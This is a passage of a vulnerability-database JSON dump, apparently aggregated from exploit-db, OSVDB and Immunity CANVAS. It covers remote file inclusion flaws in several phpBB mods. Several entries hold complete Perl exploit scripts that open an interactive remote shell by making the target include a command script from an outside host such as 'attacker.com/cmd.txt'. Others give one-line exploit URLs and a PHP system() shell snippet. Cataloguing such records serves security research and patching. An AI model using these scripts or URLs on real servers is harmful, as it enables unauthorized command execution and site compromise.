\"Connection: close\\r\\n\\n\";\n\n while ($raspuns = <$socket>)\n {\n print $raspuns;\n }\n\n print \"<Shell> \";\n $cmd = <STDIN>;\n}\n\n# milw0rm.com [2006-10-12]\n", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/2522/"}, {"lastseen": "2016-01-31T16:28:09", "bulletinFamily": "exploit", "description": "phpBB Insert User Mod <= 0.1.2 Remote File Include Exploit. CVE-2006-7100. Webapps exploit for php platform", "modified": "2006-10-12T00:00:00", "published": "2006-10-12T00:00:00", "id": "EDB-ID:2525", "href": "https://www.exploit-db.com/exploits/2525/", "type": "exploitdb", "title": "phpBB Insert User Mod <= 0.1.2 - Remote File Include Exploit", "sourceData": "#!/usr/bin/perl\n \n################################################################################\n# #\n# PHPBB insert user 0.1.2 #\n# #\n# Class: Remote File Include Vulnerability #\n# #\n# Patch: unavailable #\n# #\n# Date: 2006/10/12 #\n# #\n# Remote: Yes #\n# #\n# Type: high #\n# #\n# Site: http://www.grahameames.co.uk/phpbb/downloads/insert_user_0.1.2.zip #\n# #\n################################################################################\n\n\nuse IO::Socket;\nuse LWP::Simple;\n\n$cmdshell=\"http://attacker.com/cmd.txt\"; # <====== Change This Line With Your Personal Script\n\nprint \"\\n\";\nprint \"######################################################################\\n\";\nprint \"# #\\n\";\nprint \"# PHPBB insert user <= 0.1.2 Remote File Include Vulnerability #\\n\";\nprint \"# Bug found By : Ashiyane Corporation #\\n\";\nprint \"# Email: Behrooz Kamalian Kamalian[at]ashiyane.ir #\\n\";\nprint \"# Web Site : www.Ashiyane.ir #\\n\";\nprint \"# #\\n\";\nprint \"######################################################################\\n\";\n\n\nif (@ARGV < 2)\n{\n print \"\\n Usage: Ashiyane.pl [host] [path] \";\n print \"\\n EX : Ashiyane.pl www.victim.com /phpbb/ \\n\\n\";\nexit;\n}\n\n\n$host=$ARGV[0];\n$path=$ARGV[1];\n$vul=\"includes/functions_mod_user.php?phpbb_root_path=\"\n\nprint \"Type Your Commands ( uname -a )\\n\";\nprint \"For Exiit Type END\\n\";\n\nprint \"<Shell> \";$cmd = <STDIN>;\n\nwhile($cmd !~ \"END\") {\n $socket = IO::Socket::INET->new(Proto=>\"tcp\", PeerAddr=>\"$host\", PeerPort=>\"80\") or die \"Could not connect to host.\\n\\n\";\n\n print $socket \"GET \".$path.$vul.$cmdshell.\"?cmd=\".$cmd.\"? HTTP/1.1\\r\\n\";\n print $socket \"Host: \".$host.\"\\r\\n\";\n print $socket \"Accept: */*\\r\\n\";\n print $socket \"Connection: close\\r\\n\\n\";\n\n while ($raspuns = <$socket>)\n {\n print $raspuns;\n }\n\n print \"<Shell> \";\n $cmd = <STDIN>;\n}\n\n# milw0rm.com [2006-10-12]\n", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/2525/"}, {"lastseen": "2016-01-31T16:29:25", "bulletinFamily": "exploit", "description": "phpBB SpamBlocker Mod <= 1.0.2 Remote File Include Exploit. CVE-2006-5301. Webapps exploit for php platform", "modified": "2006-10-12T00:00:00", "published": "2006-10-12T00:00:00", "id": "EDB-ID:2533", "href": "https://www.exploit-db.com/exploits/2533/", "type": "exploitdb", "title": "phpBB SpamBlocker Mod <= 1.0.2 - Remote File Include Exploit", "sourceData": "#!/usr/bin/perl\n \n################################################################################\n# #\n# SpamBlockerMod package for phpBB #\n# #\n# Class: Remote File Include Vulnerability #\n# #\n# Patch: unavailable #\n# #\n# Date: 2006/10/12 #\n# #\n# Remote: Yes #\n# #\n# Type: high #\n# #\n# Site: http://leo.vak.ru/devel/spamblocker/spamblockermodv1.0.2.zip #\n# #\n################################################################################\n\n\nuse IO::Socket;\nuse LWP::Simple;\n\n$cmdshell=\"http://attacker.com/cmd.txt\"; # <====== Change This Line With Your Personal Script\n\nprint \"\\n\";\nprint \"######################################################################\\n\";\nprint \"# #\\n\";\nprint \"# SpamBlockerMODv <= 1.0.2 Remote File Include Vulnerability #\\n\";\nprint \"# Bug found By : Ashiyane Corporation #\\n\";\nprint \"# Email: nima salehi nima[at]ashiyane.ir #\\n\";\nprint \"# Web Site : www.Ashiyane.ir #\\n\";\nprint \"# #\\n\";\nprint \"######################################################################\\n\";\n\n\nif (@ARGV < 2)\n{\n print \"\\n Usage: Ashiyane.pl [host] [path] \";\n print \"\\n EX : Ashiyane.pl www.victim.com /phpbb/ \\n\\n\";\nexit;\n}\n\n\n$host=$ARGV[0];\n$path=$ARGV[1];\n$vul=\"root/includes/antispam.php?phpbb_root_path=\"\n\nprint \"Type Your Commands ( uname -a )\\n\";\nprint \"For Exiit Type END\\n\";\n\nprint \"<Shell> \";$cmd = <STDIN>;\n\nwhile($cmd !~ \"END\") {\n $socket = IO::Socket::INET->new(Proto=>\"tcp\", PeerAddr=>\"$host\", PeerPort=>\"80\") or die \"Could not connect to host.\\n\\n\";\n\n print $socket \"GET \".$path.$vul.$cmdshell.\"?cmd=\".$cmd.\"? HTTP/1.1\\r\\n\";\n print $socket \"Host: \".$host.\"\\r\\n\";\n print $socket \"Accept: */*\\r\\n\";\n print $socket \"Connection: close\\r\\n\\n\";\n\n while ($raspuns = <$socket>)\n {\n print $raspuns;\n }\n\n print \"<Shell> \";\n $cmd = <STDIN>;\n}\n\n# milw0rm.com [2006-10-12]\n", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/2533/"}, {"lastseen": "2016-01-31T14:48:16", "bulletinFamily": "exploit", "description": "Auction <= 1.3m (phpbb_root_path) Remote File Include Exploit. CVE-2006-2245. Webapps exploit for php platform", "modified": "2006-05-04T00:00:00", "published": "2006-05-04T00:00:00", "id": "EDB-ID:1747", "href": "https://www.exploit-db.com/exploits/1747/", "type": "exploitdb", "title": "Auction <= 1.3m phpbb_root_path Remote File Include Exploit", "sourceData": "#!/usr/bin/perl\n##\n#phpBB auction mod - Remote File Inclusion Vuln\n# Bug discovered by VietMafia\n# code copier: webDEViL w3bd3vil[at]gmail.com\n#code same as Fast Click <= 2.3.8 Remote File Inclusion exploit\n# dork: intext:\"phpbb - auction\" inurl:\"auction\"\n# usage:\n# perl wb1.pl <target> <cmd shell location> <cmd shell variable>\n# perl wb1.pl http://vulnerable.com/ http://target.com/cmd.gif cmd\n# cmd shell example: <?system($cmd);?>\n# cmd shell variable: ($_GET[cmd]);\n\nuse LWP::UserAgent;\n\n$Path = $ARGV[0];\n$Pathtocmd = $ARGV[1];\n$cmdv = $ARGV[2];\n\nif($Path!~/http:\\/\\// || $Pathtocmd!~/http:\\/\\// || !$cmdv){usage()}\n\nhead();\n\nwhile()\n{\n print \"[shell] \\$\";\nwhile(<STDIN>)\n {\n $cmd=$_;\n chomp($cmd);\n\n$xpl = LWP::UserAgent->new() or die;\n$req = HTTP::Request->new(GET =>$Path.'/auction/auction_common.php?phpbb_root_path='.$Pathtocmd.'?&'.$cmdv.'='.$cmd)or die \"\\nCould Not connect\\n\"; \n\n\n$res = $xpl->request($req);\n$return = $res->content;\n$return =~ tr/[\\n]/[\u00ea]/;\n\nif (!$cmd) {print \"\\nPlease Enter a Command\\n\\n\"; $return =\"\";}\n\nelsif ($return =~/failed to open stream: HTTP request failed!/ || $return =~/: Cannot execute a blank command in <b>/)\n {print \"\\nCould Not Connect to cmd Host or Invalid Command Variable\\n\";exit}\nelsif ($return =~/^<br.\\/>.<b>Fatal.error/) {print \"\\nInvalid Command or No Return\\n\\n\"}\n\nif($return =~ /(.*)/)\n\n{\n $finreturn = $1;\n $finreturn=~ tr/[\u00ea]/[\\n]/;\n print \"\\r\\n$finreturn\\n\\r\";\n last;\n}\n\nelse {print \"[shell] \\$\";}}}last;\n\nsub head()\n {\n print \"\\n============================================================================\\r\\n\";\n print \" phpBB auction mod - Remote File Inclusion Vuln\\r\\n\";\n print \"============================================================================\\r\\n\";\n }\nsub usage()\n {\n head();\n print \" Usage: perl wb1.pl <target> <cmd shell location> <cmd shell variable>\\r\\n\\n\";\n print \" <Site> - Full path to phpBB auction ex: http://www.site.com/ or http://www.site.com/phpbb/ \\r\\n\";\n print \" <cmd shell> - Path to cmd Shell e.g http://evilserver/cmd.gif \\r\\n\";\n print \" <cmd variable> - Command variable used in php shell \\r\\n\";\n print \"============================================================================\\r\\n\";\n print \" webDEViL w3bd3vil[at]gmail.com \\r\\n\";\n print \"============================================================================\\r\\n\";\n exit();\n }\n\n# milw0rm.com [2006-05-04]\n", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/1747/"}, {"lastseen": "2016-01-31T16:31:40", "bulletinFamily": "exploit", "description": "phpBB SearchIndexer Mod (archive_topic.php) Remote File Include Exploit. CVE-2006-5418. Webapps exploit for php platform", "modified": "2006-10-13T00:00:00", "published": "2006-10-13T00:00:00", "id": "EDB-ID:2549", "href": "https://www.exploit-db.com/exploits/2549/", "type": "exploitdb", "title": "phpBB SearchIndexer Mod archive_topic.php Remote File Include Exploit", "sourceData": "#!/usr/bin/perl\n \n#####################################################################################################\n# #\n# pbpbb archive for search engines #\n# #\n# Class: Remote File Include Vulnerability #\n# #\n# Patch: unavailable #\n# #\n# Date: 2006/10/12 #\n# #\n# Remote: Yes #\n# #\n# Type: high #\n# #\n# Site: http://mambopower.net/ http://www.mambopower.net/downloads/phpbb_searchindexer.zip #\n# #\n#####################################################################################################\n\n\nuse IO::Socket;\nuse LWP::Simple;\n\n$cmdshell=\"http://attacker.com/cmd.txt\"; # <====== Change This Line With Your Personal Script\n\nprint \"\\n\";\nprint \"##########################################################################\\n\";\nprint \"# #\\n\";\nprint \"# pbpbb archive for search engines Remote File Include Vulnerability #\\n\";\nprint \"# Bug found By : Ashiyane Corporation #\\n\";\nprint \"# Email: nima salehi nima[at]ashiyane.ir #\\n\";\nprint \"# Web Site : www.Ashiyane.ir #\\n\";\nprint \"# #\\n\";\nprint \"##########################################################################\\n\";\n\n\nif (@ARGV < 2)\n{\n print \"\\n Usage: Ashiyane.pl [host] [path] \";\n print \"\\n EX : Ashiyane.pl www.victim.com /path/ \\n\\n\";\nexit;\n}\n\n\n$host=$ARGV[0];\n$path=$ARGV[1];\n$vul=\"includes/archive/archive_topic.php?phpbb_root_path=\"\n\nprint \"Type Your Commands ( uname -a )\\n\";\nprint \"For Exiit Type END\\n\";\n\nprint \"<Shell> \";$cmd = <STDIN>;\n\nwhile($cmd !~ \"END\") {\n $socket = IO::Socket::INET->new(Proto=>\"tcp\", PeerAddr=>\"$host\", PeerPort=>\"80\") or die \"Could not connect to host.\\n\\n\";\n\n print $socket \"GET \".$path.$vul.$cmdshell.\"?cmd=\".$cmd.\"? HTTP/1.1\\r\\n\";\n print $socket \"Host: \".$host.\"\\r\\n\";\n print $socket \"Accept: */*\\r\\n\";\n print $socket \"Connection: close\\r\\n\\n\";\n\n while ($raspuns = <$socket>)\n {\n print $raspuns;\n }\n\n print \"<Shell> \";\n $cmd = <STDIN>;\n}\n\n# milw0rm.com [2006-10-13]\n", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/2549/"}, {"lastseen": "2016-01-31T20:54:53", "bulletinFamily": "exploit", "description": "phpBB Plus <= 1.53 (phpbb_root_path) Remote File Inclusion Vuln. CVE-2007-5009. Webapps exploit for php platform", "modified": "2007-09-20T00:00:00", "published": "2007-09-20T00:00:00", "id": "EDB-ID:4434", "href": "https://www.exploit-db.com/exploits/4434/", "type": "exploitdb", "title": "phpBB Plus <= 1.53 phpbb_root_path Remote File Inclusion Vuln", "sourceData": "AUTHOR = Mehrad Ansari Targhi\nE-Mail : mehrad1989@gmail.com\nMy Yahoo Messenger ID : mehrad_1989\n\nScript Download URL : http://www.phpbbplus.net/PhpBBPlus1.53.zip\n\nThis Is A RFI Bug .\nThis Bug Is In : [ PHPBBPLUS INSTALLED ]/language/lang_german/lang\n_main_album.php\n\nExploit : http://[PHPPLUS]/language/lang_german/lang_main_album.php?phpbb_root_path=[ http://shell.txt]?a=\n\n# milw0rm.com [2007-09-20]\n", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/4434/"}, {"lastseen": "2016-01-31T16:31:55", "bulletinFamily": "exploit", "description": "phpBB ACP User Registration Mod 1.0 File Inclusion Vulnerability. CVE-2006-5390. Webapps exploit for php platform", "modified": "2006-10-13T00:00:00", "published": "2006-10-13T00:00:00", "id": "EDB-ID:2551", "href": "https://www.exploit-db.com/exploits/2551/", "type": "exploitdb", "title": "phpBB ACP User Registration Mod 1.0 File Inclusion Vulnerability", "sourceData": " ..%%%%....%%%%...%%..%%...........%%%%...%%%%%...%%%%%%..%%...%%.\n .%%......%%..%%..%%..%%..........%%..%%..%%..%%..%%......%%...%%.\n ..%%%%...%%..%%..%%%%%%..%%%%%%..%%......%%%%%...%%%%....%%.%.%%.\n .....%%..%%..%%..%%..%%..........%%..%%..%%..%%..%%......%%%%%%%.\n ..%%%%....%%%%...%%..%%...........%%%%...%%..%%..%%%%%%...%%.%%..\n .................................................................\n \n phpBB ACP User Registration (MMW) Mod 1.00 File Inclusion Vulnerability\n\n\nDate: 2006/10/13\nTime: 18:20:57 => GMT+1:00\n\nFounder: bd0rk || SOH-Crew\nWebsite: www.soh-crew.it.tt\nGreetz: str0ke, Perle, Tr4ileR, nukedx\n\nDownload: http://www.phpbb.com/phpBB/catdb.php?mode=download&id=1988012\n\nCode: include_once($phpbb_root_path . 'includes/functions_validate.' . $phpEx);\ninclude_once($phpbb_root_path . 'includes/functions_post.' . $phpEx);\ninclude_once($phpbb_root_path . 'includes/bbcode.' . $phpEx);\n\n[+]Exploit: http://[target]/[directory]/includes/functions_mod_user.php?phpbb_root_path=http://Sh3llScript?\n\n# milw0rm.com [2006-10-13]\n", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/2551/"}], "osvdb": [{"lastseen": "2017-04-28T13:20:26", "bulletinFamily": "software", "description": "# No description provided by the source\n\n## References:\nSecurity Tracker: 1017058\n[Secunia Advisory ID:22387](https://secuniaresearch.flexerasoftware.com/advisories/22387/)\n[Related OSVDB ID: 29713](https://vulners.com/osvdb/OSVDB:29713)\n[Related OSVDB ID: 29714](https://vulners.com/osvdb/OSVDB:29714)\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2006-10/0181.html\nISS X-Force ID: 29491\nGeneric Exploit URL: http://www.milw0rm.com/exploits/2522\nFrSIRT Advisory: ADV-2006-4029\n[CVE-2006-5306](https://vulners.com/cve/CVE-2006-5306)\nBugtraq ID: 20484\n", "modified": "2006-10-12T10:18:46", "published": "2006-10-12T10:18:46", "href": "https://vulners.com/osvdb/OSVDB:29712", "id": "OSVDB:29712", "title": "Journals System includes/journals_delete.php phpbb_root_path Variable Remote File Inclusion", "type": "osvdb", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-04-28T13:20:26", "bulletinFamily": "software", "description": "# No description provided by the source\n\n## References:\nSecurity Tracker: 1017058\n[Secunia Advisory ID:22387](https://secuniaresearch.flexerasoftware.com/advisories/22387/)\n[Related OSVDB ID: 29712](https://vulners.com/osvdb/OSVDB:29712)\n[Related OSVDB ID: 29714](https://vulners.com/osvdb/OSVDB:29714)\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2006-10/0181.html\nISS X-Force ID: 29491\nGeneric Exploit URL: http://www.milw0rm.com/exploits/2522\nFrSIRT Advisory: ADV-2006-4029\n[CVE-2006-5306](https://vulners.com/cve/CVE-2006-5306)\nBugtraq ID: 20484\n", "modified": "2006-10-12T10:18:46", "published": "2006-10-12T10:18:46", "href": "https://vulners.com/osvdb/OSVDB:29713", "id": "OSVDB:29713", "title": "Journals System includes/journals_post.php phpbb_root_path Variable Remote File Inclusion", "type": "osvdb", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-04-28T13:20:26", "bulletinFamily": "software", "description": "# No description provided by the source\n\n## References:\nSecurity Tracker: 1017058\n[Secunia Advisory ID:22387](https://secuniaresearch.flexerasoftware.com/advisories/22387/)\n[Related OSVDB ID: 29713](https://vulners.com/osvdb/OSVDB:29713)\n[Related OSVDB ID: 29712](https://vulners.com/osvdb/OSVDB:29712)\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2006-10/0181.html\nISS X-Force ID: 29491\nGeneric Exploit URL: http://www.milw0rm.com/exploits/2522\nFrSIRT Advisory: ADV-2006-4029\n[CVE-2006-5306](https://vulners.com/cve/CVE-2006-5306)\nBugtraq ID: 20484\n", "modified": "2006-10-12T10:18:46", "published": "2006-10-12T10:18:46", "href": "https://vulners.com/osvdb/OSVDB:29714", "id": "OSVDB:29714", "title": "Journals System includes/journals_edit.php phpbb_root_path Variable Remote File Inclusion", "type": "osvdb", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-04-28T13:20:31", "bulletinFamily": "software", "description": "# No description provided by the source\n\n## References:\nISS X-Force ID: 29512\nGeneric Exploit URL: http://www.milw0rm.com/exploits/2531\n[CVE-2006-7147](https://vulners.com/cve/CVE-2006-7147)\nBugtraq ID: 20525\n", "modified": "2006-10-12T03:11:09", "published": "2006-10-12T03:11:09", "href": "https://vulners.com/osvdb/OSVDB:35450", "id": "OSVDB:35450", "title": "phpBB Import Tools includes/functions_mod_user.php phpbb_root_path Variable Remote File Inclusion", "type": "osvdb", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-04-28T13:20:31", "bulletinFamily": "software", "description": "## Manual Testing Notes\nhttp://[target]/[path]/functions_mod_user.php?phpbb_root_path=http://[attacker]/shell.txt?&cmd=ls\n## References:\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2006-10/0187.html\nGeneric Exploit URL: http://www.milw0rm.com/exploits/2525\n[CVE-2006-7100](https://vulners.com/cve/CVE-2006-7100)\nBugtraq ID: 20493\n", "modified": "2006-10-12T20:19:44", "published": "2006-10-12T20:19:44", "href": "https://vulners.com/osvdb/OSVDB:35449", "id": "OSVDB:35449", "title": "phpBB Insert User includes/functions_mod_user.php phpbb_root_path Variable Remote File Inclusion", "type": "osvdb", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-04-28T13:20:26", "bulletinFamily": "software", "description": "# No description provided by the source\n\n## References:\n[Secunia Advisory ID:22356](https://secuniaresearch.flexerasoftware.com/advisories/22356/)\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2006-10/0198.html\nISS X-Force ID: 29506\nGeneric Exploit URL: http://milw0rm.com/exploits/2533\nFrSIRT Advisory: ADV-2006-4028\n[CVE-2006-5301](https://vulners.com/cve/CVE-2006-5301)\nBugtraq ID: 20501\n", "modified": "2006-10-12T09:48:48", "published": "2006-10-12T09:48:48", "href": "https://vulners.com/osvdb/OSVDB:29711", "id": "OSVDB:29711", "title": "SpamBlockerMod for phpBB includes/antispam.php phpbb_root_path Variable Remote File Inclusion", "type": "osvdb", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-04-28T13:20:22", "bulletinFamily": "software", "description": "## Vulnerability Description\nphpbb-auction contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to auction_common.php not properly sanitizing user input supplied to the 'phpbb_root_path' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.\n## Technical Description\nThis vulnerability is only present when the register_globals PHP option is set to 'on'. This has not been the default setting for PHP installs since version 4.2.0 (22-Apr-2002).\n## Solution Description\nCurrently, there are no known upgrades, patches, or workarounds available to correct this issue.\n## Short Description\nphpbb-auction contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to auction_common.php not properly sanitizing user input supplied to the 'phpbb_root_path' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.\n## Manual Testing Notes\nhttp://[target]/[path]/auction/auction_common.php?phpbb_root_path=http://[attacker]\n## References:\nVendor URL: http://www.phpbb-auction.com/\n[Secunia Advisory ID:19944](https://secuniaresearch.flexerasoftware.com/advisories/19944/)\nOther Advisory URL: http://pridels.blogspot.com/2006/05/phpbb-auction-mod-remote-file.html\n[Nessus Plugin ID:21323](https://vulners.com/search?query=pluginID:21323)\nISS X-Force ID: 26192\nFrSIRT Advisory: ADV-2006-1641\n[CVE-2006-2245](https://vulners.com/cve/CVE-2006-2245)\nBugtraq ID: 17822\n", "modified": "2006-05-03T08:17:35", "published": "2006-05-03T08:17:35", "href": "https://vulners.com/osvdb/OSVDB:25263", "id": "OSVDB:25263", "title": "phpBB phpbb-Auction auction_common.php phpbb_root_path Variable Remote File Inclusion", "type": "osvdb", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-04-28T13:20:27", "bulletinFamily": "software", "description": "# No description provided by the source\n\n## References:\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2006-10/0205.html\nISS X-Force ID: 29573\n[CVE-2006-7090](https://vulners.com/cve/CVE-2006-7090)\nBugtraq ID: 20518\n", "modified": "2006-10-12T00:00:00", "published": "2006-10-12T00:00:00", "href": "https://vulners.com/osvdb/OSVDB:31029", "id": "OSVDB:31029", "title": "phpBB Security phpbb_security.php phpbb_root_path Remote File Inclusion", "type": "osvdb", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-04-28T13:20:34", "bulletinFamily": "software", "description": "## Manual Testing Notes\nhttp://[target]/language/lang_english/lang_admin_album.php?phpbb_root_path=[RFI]?a=\n## References:\nVendor Specific News/Changelog Entry: http://www.phpbb2.de/ftopic45218.html\n[Secunia Advisory ID:26888](https://secuniaresearch.flexerasoftware.com/advisories/26888/)\n[Related OSVDB ID: 38723](https://vulners.com/osvdb/OSVDB:38723)\n[Related OSVDB ID: 38724](https://vulners.com/osvdb/OSVDB:38724)\nFrSIRT Advisory: ADV-2007-3247\n[CVE-2007-5100](https://vulners.com/cve/CVE-2007-5100)\nBugtraq ID: 25776\n", "modified": "2007-09-22T00:00:00", "published": "2007-09-22T00:00:00", "href": "https://vulners.com/osvdb/OSVDB:38725", "id": "OSVDB:38725", "title": "phpBB Plus language/lang_english/lang_admin_album.php phpbb_root_path Variable Remote File Inclusion", "type": "osvdb", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-04-28T13:20:34", "bulletinFamily": "software", "description": "## Manual Testing Notes\nhttp://[target]/language/lang_german/lang_admin_album.php?phpbb_root_path=[RFI]?a=\n## References:\nVendor Specific News/Changelog Entry: http://www.phpbb2.de/ftopic45218.html\n[Secunia Advisory ID:26888](https://secuniaresearch.flexerasoftware.com/advisories/26888/)\n[Related OSVDB ID: 38725](https://vulners.com/osvdb/OSVDB:38725)\n[Related OSVDB ID: 38724](https://vulners.com/osvdb/OSVDB:38724)\nFrSIRT Advisory: ADV-2007-3247\n[CVE-2007-5100](https://vulners.com/cve/CVE-2007-5100)\nBugtraq ID: 25776\n", "modified": "2007-09-22T00:00:00", "published": "2007-09-22T00:00:00", "href": "https://vulners.com/osvdb/OSVDB:38723", "id": "OSVDB:38723", "title": "phpBB Plus language/lang_german/lang_admin_album.php phpbb_root_path Variable Remote File Inclusion", "type": "osvdb", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "canvas": [{"lastseen": "2016-09-25T14:13:54", "bulletinFamily": "exploit", "description": "**Name**| phpbbplus_include \n---|--- \n**CVE**| CVE-2007-5009 \n**Exploit Pack**| [CANVAS](<http://http://www.immunityinc.com/products-canvas.shtml>) \n**Description**| phpBBplus Remote file inclusion \n**Notes**| CVSS: 6.8 \nRepeatability: Infinite \nVENDOR: phpbbplus.net \nCVE Url: http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5009 \nCVE Name: CVE-2007-5009 \n\n", "modified": "2007-09-20T17:17:00", "published": "2007-09-20T17:17:00", "id": "PHPBBPLUS_INCLUDE", "href": "http://exploitlist.immunityinc.com/home/exploitpack/CANVAS/phpbbplus_include", "type": "canvas", "title": "Immunity Canvas: PHPBBPLUS_INCLUDE", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}]}